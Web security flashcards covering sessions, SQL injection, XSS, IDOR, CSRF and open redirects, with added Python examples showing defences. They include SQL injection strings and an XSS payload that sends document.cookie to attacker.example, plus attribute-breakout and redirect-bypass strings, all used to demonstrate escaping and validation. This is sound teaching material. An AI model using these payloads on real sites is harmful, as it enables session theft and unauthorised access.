6. Web Security Flashcards

1
Q

stateless HTTP

A

each HTTP request/response pair is independent and the server keeps no memory of earlier requests, so on its own it cannot tell whether the user has already logged in. Anything that must persist across requests (login state, a shopping cart) has to be carried explicitly, e.g. in a cookie that references a server-side session

2
Q

sessions

A
  1. server-side data structure that holds data only for the time a user is interacting with the website
  2. used to manage state on top of stateless HTTP
  3. session data is stored on the server
  4. session id is stored on the client, normally in a cookie
  5. the browser sends the session id with every request and the server uses it to look up the stored data
  6. the session is lost when the browser is closed (session cookie discarded) or when the server expires it
3
Q

session hijacking

A
  1. the session starts when the user logs in and the server returns a session id to the browser
  2. the attacker steals the session id (e.g. by sniffing it on an unencrypted connection, via XSS, or by planting a known id before login that the server does not change after authentication)
  3. with the session id the attacker hijacks the session and acts as the user without knowing the password

defence

  • regenerate the session id at login (and on any privilege change), so an id captured or planted before authentication is useless afterwards
  • send the session cookie with the Secure, HttpOnly and SameSite attributes, over HTTPS only
  • expire sessions after inactivity and invalidate them on logout
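
The session mechanism from cards 2 and 3 in working code, as an added example that is not part of the original flashcards: a minimal server-side session store with an unguessable id, an idle timeout, and id rotation at login. The class and function names are hypothetical; the "fixation" scenario shows why the id must change at authentication.

```python
import secrets
import time

# Added example (not from the flashcards). Hypothetical in-memory session store.

SESSION_TTL = 15 * 60  # idle timeout in seconds


class SessionStore:
    def __init__(self, ttl=SESSION_TTL):
        self.ttl = ttl
        self._sessions = {}  # session id -> {"user": ..., "last_seen": ...}

    def create(self, now=None):
        # 32 random bytes from the OS CSPRNG: unguessable, unlike a counter or a timestamp
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "last_seen": now or time.time()}
        return sid

    def get(self, sid, now=None):
        now = now or time.time()
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        if now - sess["last_seen"] > self.ttl:
            del self._sessions[sid]  # idle session expired: the id no longer works
            return None
        sess["last_seen"] = now
        return sess

    def login(self, sid, user, now=None):
        """Authenticate and return a NEW session id; the pre-login id is invalidated."""
        self._sessions.pop(sid, None)
        new_sid = self.create(now)
        self._sessions[new_sid]["user"] = user
        return new_sid

    def logout(self, sid):
        self._sessions.pop(sid, None)

    def current_user(self, sid, now=None):
        sess = self.get(sid, now)
        return sess["user"] if sess else None


def set_cookie_header(sid):
    # Cookie attributes that limit how the id can be stolen: not over plain HTTP,
    # not readable by page scripts, not sent on cross-site requests by default
    return f"Set-Cookie: sid={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


def fixation_demo():
    """Attacker plants an anonymous id, the victim logs in with it. Does it still work?"""
    store = SessionStore()
    planted = store.create()                    # attacker obtains this id before login
    victim_sid = store.login(planted, "alice")  # victim authenticates; id is rotated
    return {
        "planted_after_login": store.current_user(planted),     # None: rotated away
        "victim_after_login": store.current_user(victim_sid),   # "alice"
    }


if __name__ == "__main__":
    print(fixation_demo())
    print(set_cookie_header("example-id"))
```

The `now` parameter exists only so the timeout can be exercised deterministically; a real store would take the clock from the request.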
4
Q

GET vs POST

A

GET: parameters are in the URL, so they end up in browser history, bookmarks, proxy and server logs, and the Referer header. Never put credentials, session ids or other secrets in a GET query string.

POST: data is in the request body, which is normally not logged or leaked via Referer. It is not encrypted, though: without TLS an attacker on the network reads a POST body as easily as a URL. Use POST for state-changing operations and HTTPS for both.

5
Q

OWASP top web security risks

A
  1. injection (e.g. SQL injection)
  2. broken authentication (and session management)
  3. sensitive data exposure
  4. broken access control
  5. security misconfiguration
  6. cross site scripting
  7. insecure direct object reference
(the cards below follow the 2013 edition, where insecure direct object reference, missing function level access control, cross site request forgery and unvalidated redirects are separate entries; the 2017 edition folds the first two into broken access control)
6
Q

sql injection

A

attacker-supplied input is concatenated into a SQL query and changes the query the developer intended to run
fred' OR '1'='1
' OR 1=1 --

problem
- untrusted input is pasted into the query string, so characters with special meaning in SQL (quotes, comment markers, semicolons) are interpreted as code rather than data

defence

  • prepared statements / parameterised queries: the query structure is fixed before the data is bound
  • stored procedures, as long as they do not build dynamic SQL internally
  • run the application with a database account that has only the privileges it needs
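
The two payloads on this card run against a vulnerable and a parameterised login query, as an added example that is not part of the original flashcards. It uses the sqlite3 module from the standard library with a constructed in-memory users table; passwords are stored in plaintext here only to keep the query simple.

```python
import sqlite3

# Added example (not from the flashcards). Constructed users table, in memory.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("fred", "hunter2"), ("alice", "s3cret"), ("bob", "qwerty")],
    )
    return conn


def login_vulnerable(conn, name, password):
    # String concatenation: the input becomes part of the SQL grammar
    sql = ("SELECT name FROM users WHERE name = '" + name
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, name, password):
    # Parameterised query: the driver binds the values; input is never parsed as SQL
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


if __name__ == "__main__":
    conn = make_db()
    # Payload 1: name = fred' OR '1'='1 with an empty password.
    # AND binds tighter than OR, so the WHERE clause becomes
    # name='fred' OR ('1'='1' AND password=''): fred is returned without a password.
    print(login_vulnerable(conn, "fred' OR '1'='1", ""))
    # Payload 2: ' OR 1=1 -- comments out the password check entirely; every row matches.
    print(login_vulnerable(conn, "' OR 1=1 --", "x"))
    # Same payloads against the parameterised query match nothing.
    print(login_safe(conn, "fred' OR '1'='1", ""), login_safe(conn, "' OR 1=1 --", "x"))
    print(login_safe(conn, "fred", "hunter2"))
```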
7
Q

broken authentication

A

errors in how login and session handling are implemented, e.g.

  • no idle or absolute session timeout, so a session stays valid if the user forgets to log out
  • passwords stored in plaintext or with a fast unsalted hash instead of a salted, slow password hash
  • session id that is predictable, exposed in the URL, or sent over plain HTTP instead of only over HTTPS in a Secure, HttpOnly cookie
8
Q

cross site scripting

A
  1. reflected
    - non persistent
    - script is passed in the request (URL parameter, form field) and echoed back by the server in the response
    - attacker tricks the user into clicking a crafted link
  2. stored
    - script is stored on the server, e.g. in a forum post or profile field
    - every later user who views the page becomes a victim; no attacker link is needed
  3. DOM based
    - the server never sees the payload: client-side JavaScript reads it (e.g. from location.hash or a URL parameter) and writes it into the page with innerHTML, document.write etc.
    - the victim clicks a crafted link and the script runs entirely in the browser

defence
- escape untrusted data for the context it is inserted into (HTML body, attribute, JavaScript, URL) before output
- in client-side code prefer textContent over innerHTML
- add a Content-Security-Policy as defence in depth

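
The "escape before inserting" defence applied to a reflected search page, as an added example that is not part of the original flashcards. It renders a constructed payload through an unescaped template and through context-appropriate encoders (html.escape for the HTML body and attribute contexts, urllib.parse.quote for a URL component) from the standard library; the template strings and function names are hypothetical.

```python
import html
from urllib.parse import quote

# Added example (not from the flashcards). Constructed payloads:
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = 'x" onmouseover="alert(1)'   # breaks out of a quoted attribute


def render_vulnerable(term):
    # Search template that concatenates the raw term: reflected XSS
    return f"<h1>Results for {term}</h1>"


def render_safe(term):
    # Escape for the HTML body context: < > & " ' become entities, so the
    # browser shows the payload as text instead of parsing it as markup
    return f"<h1>Results for {html.escape(term)}</h1>"


def render_link_safe(term):
    # Each context gets its own encoder: the attribute value is HTML-escaped
    # (quotes included), the query string component is percent-encoded
    return ('<a href="/search?q=' + quote(term, safe="")
            + '" title="' + html.escape(term, quote=True)
            + '">search again</a>')


def is_script_injected(rendered):
    # Crude check used for the demo: a live <script> tag survived rendering
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(render_link_safe(ATTR_PAYLOAD))
```

The attribute case is the one people get wrong: HTML-escaping without quoting, or inserting into an unquoted attribute, still lets `onmouseover=` break out, which is why the template always quotes the attribute and escapes the quote character.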
9
Q

insecure direct object reference

A

the application uses a user-supplied value (id, filename, key) to fetch an object directly, and the attacker changes that value to reach another user's object because the server never checks that the caller is allowed to see it
eg https://www.blablabla.com/?customerID=1234 -> change to 1233 and read another customer's record

defence
- on every request check that the authenticated user is authorised for the referenced object, or use per-user indirect references (a random token mapped to the real id on the server)

10
Q

security misconfiguration

A

can be misconfigured at many levels (web server, application framework, database, cloud or container platform), e.g.

  • not keeping software up to date
  • not patching known vulnerabilities
  • leaving default accounts and credentials in place
  • debug mode, directory listing or verbose error pages enabled in production
  • unnecessary services, ports or sample applications left installed

defence
- principle of least privilege
- a repeatable hardening baseline applied identically to every environment, with regular configuration review

11
Q

sensitive data exposure

A
  • database not protected adequately (weak access control, exposed to the network)
  • data in the database or in backups stored unencrypted
  • data sent over plain HTTP
  • attack paths: SQL injection, network sniffing, cracking weakly hashed passwords with rainbow tables

defence

  • encrypt data at rest and in transit (TLS)
  • store passwords only as salted hashes made with a slow password hash (bcrypt, scrypt, Argon2, PBKDF2); a per-password salt makes rainbow tables useless
  • apply access control and minimise what sensitive data is collected and retained
  • employee training and awareness
12
Q

missing function level access control

A

a server-side function (e.g. an admin action or API endpoint) is executed without checking that the calling user has the privilege to use it; hiding the button in the UI does not stop a user who requests the URL directly

defence

  • don't show functions the user is not allowed to use, but treat that as usability only, not security
  • enforce the authorisation check on the server for every function call, and deny by default
  • principle of least privilege
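
Both access-control cards, insecure direct object reference (card 9) and missing function level access control (card 12), in one worked example that is not part of the original flashcards. The customerID lookup from card 9 is shown with and without an ownership check, and a role check is applied to an admin-only function. The data, role model and function names are constructed for the example.

```python
from functools import wraps

# Added example (not from the flashcards). Constructed data: which user owns
# which customer record, and which roles each user holds.
CUSTOMERS = {
    1233: {"owner": "bob",   "name": "Bob Ltd",  "balance": 900},
    1234: {"owner": "alice", "name": "Alice Co", "balance": 1200},
}
ROLES = {"alice": {"user"}, "bob": {"user"}, "root": {"user", "admin"}}


class Forbidden(Exception):
    pass


def is_admin(user):
    return "admin" in ROLES.get(user, set())


def get_customer_idor(current_user, customer_id):
    # Vulnerable: trusts ?customerID= and never asks who is calling,
    # so bob changes 1233 to 1234 and reads alice's record
    return CUSTOMERS[customer_id]


def get_customer(current_user, customer_id):
    # Object-level check: the record must belong to the caller (or caller is admin)
    record = CUSTOMERS.get(customer_id)
    if record is None or (record["owner"] != current_user and not is_admin(current_user)):
        # Same response for "does not exist" and "not yours": no id enumeration oracle
        raise Forbidden("customer not found")
    return record


def requires_role(role):
    # Function-level check, enforced on the server no matter what the UI showed
    def decorator(fn):
        @wraps(fn)
        def wrapper(current_user, *args, **kwargs):
            if role not in ROLES.get(current_user, set()):
                raise Forbidden(f"{fn.__name__} requires role {role}")
            return fn(current_user, *args, **kwargs)
        return wrapper
    return decorator


@requires_role("admin")
def export_all_customers(current_user):
    return sorted(CUSTOMERS)


def denied(fn, *args):
    """True if the call is rejected by an authorisation check (used for the demo)."""
    try:
        fn(*args)
        return False
    except Forbidden:
        return True


if __name__ == "__main__":
    print(get_customer_idor("bob", 1234))          # IDOR: bob reads alice's record
    print(denied(get_customer, "bob", 1234))        # True: ownership check blocks it
    print(denied(export_all_customers, "alice"))    # True: function-level check
    print(export_all_customers("root"))             # [1233, 1234]
```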
13
Q

cross site request forgery

A

the attacker's page (or an emailed link) makes the victim's browser send a request to a site where the victim is already authenticated; the browser attaches the session cookie automatically, so the site performs the action as the victim

  • the attacker gets whatever the victim's privilege allows
  • requires social engineering: the victim must visit the attacker's page or click the link

defence

  • use challenge (anti-CSRF) tokens: a secret, unpredictable value tied to the session that a page on another origin cannot read
  • for state-changing operations, include the token in the request (hidden form field or header); the server rejects the request if the token is missing or does not match the session
  • set SameSite on the session cookie as a second layer
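
The challenge-token defence from this card in working code, as an added example that is not part of the original flashcards. A hypothetical money-transfer endpoint is shown without and with a per-session token; requests and sessions are plain dicts so the forged request a victim's browser would send from an attacker page can be constructed inline.

```python
import hmac
import secrets

# Added example (not from the flashcards). Hypothetical session table and
# request shape: {"cookies": {...}, "form": {...}}.

SESSIONS = {}   # session id -> {"user": ..., "csrf": ...}


def new_session(user):
    sid = secrets.token_urlsafe(32)
    # Token is random per session and lives only server side and in the page's own forms
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for_form(sid):
    # Embedded as <input type="hidden" name="csrf"> in the legitimate form;
    # same-origin policy stops a page on attacker.example from reading it
    return SESSIONS[sid]["csrf"]


def transfer_vulnerable(request):
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if sess is None:
        return 401, "not logged in"
    # Cookie present, so the request is treated as the user's intent
    return 200, f"{sess['user']} sent {request['form']['amount']} to {request['form']['to']}"


def transfer_protected(request):
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if sess is None:
        return 401, "not logged in"
    token = request["form"].get("csrf", "")
    # Constant-time compare against the token bound to THIS session
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return 403, "bad csrf token"
    return 200, f"{sess['user']} sent {request['form']['amount']} to {request['form']['to']}"


def forged_request(sid, guessed_token=None):
    # What the victim's browser sends when it loads attacker.example: the site's
    # cookie is attached automatically, but the attacker cannot supply the real token
    form = {"to": "attacker", "amount": "1000"}
    if guessed_token is not None:
        form["csrf"] = guessed_token
    return {"cookies": {"sid": sid}, "form": form}


def legitimate_request(sid):
    return {"cookies": {"sid": sid},
            "form": {"to": "bob", "amount": "10", "csrf": csrf_token_for_form(sid)}}


if __name__ == "__main__":
    sid = new_session("alice")
    print(transfer_vulnerable(forged_request(sid)))    # (200, ...) forged transfer succeeds
    print(transfer_protected(forged_request(sid)))     # (403, 'bad csrf token')
    print(transfer_protected(legitimate_request(sid))) # (200, ...)
```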
14
Q

using components with known vulnerabilities

A

libraries, frameworks and other third party components run with the same privilege as the application, so a known vulnerability in one of them is a vulnerability in your application

defence

  • keep components up to date
  • evaluate a component's vulnerability history and maintenance status before adopting it
  • keep an inventory of every third party component and version, including transitive dependencies, so you know your attack surface; watch vulnerability feeds and run a dependency scanner against that inventory
15
Q

unvalidated redirect

A

the application redirects or forwards to a URL taken from a request parameter (e.g. ?next=) without validating it, so a link that begins with the trusted domain can send the victim to an attacker's phishing site

defence

  • avoid redirects and forwards driven by user input
  • if a redirect is needed, have the user confirm the destination
  • allow-list the permitted redirect targets (or map a short identifier to a URL on the server) and check the value before redirecting
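
The allow-list defence from this card as a validator for a ?next= parameter, an added example that is not part of the original flashcards. It goes slightly beyond the card by also handling the common bypasses a pentester tries against such checks (protocol-relative `//host`, backslashes, `user@host` confusion, non-HTTP schemes). The host name is the card's own placeholder domain; the function name and fallback are hypothetical.

```python
from urllib.parse import urlsplit

# Added example (not from the flashcards). Hypothetical allow-list and fallback.
ALLOWED_HOSTS = {"www.blablabla.com"}
FALLBACK = "/"


def safe_redirect_target(next_param, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return next_param if it stays on an allow-listed host, else the fallback."""
    if not next_param:
        return fallback
    # Browsers treat backslash like slash in URLs, so "/\evil" becomes "//evil";
    # normalise before parsing so the parser sees what the browser will see
    candidate = next_param.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return fallback                      # javascript:, data:, etc.
    if parts.netloc:
        # Absolute or protocol-relative URL: hostname (the part after any
        # user@ and before any :port) must be on the allow-list
        host = (parts.hostname or "").lower()
        return candidate if host in allowed_hosts else fallback
    if candidate.startswith("//") or not candidate.startswith("/"):
        return fallback                      # must be a site-relative path
    return candidate


if __name__ == "__main__":
    for value in ["/account", "https://www.blablabla.com/account",
                  "https://evil.example/phish", "//evil.example", "/\\evil.example",
                  "javascript:alert(1)", "https://www.blablabla.com@evil.example/"]:
        print(f"{value!r:45} -> {safe_redirect_target(value)!r}")
```

Mapping a short identifier to a URL on the server side removes the parsing problem entirely and is preferable where the set of destinations is small.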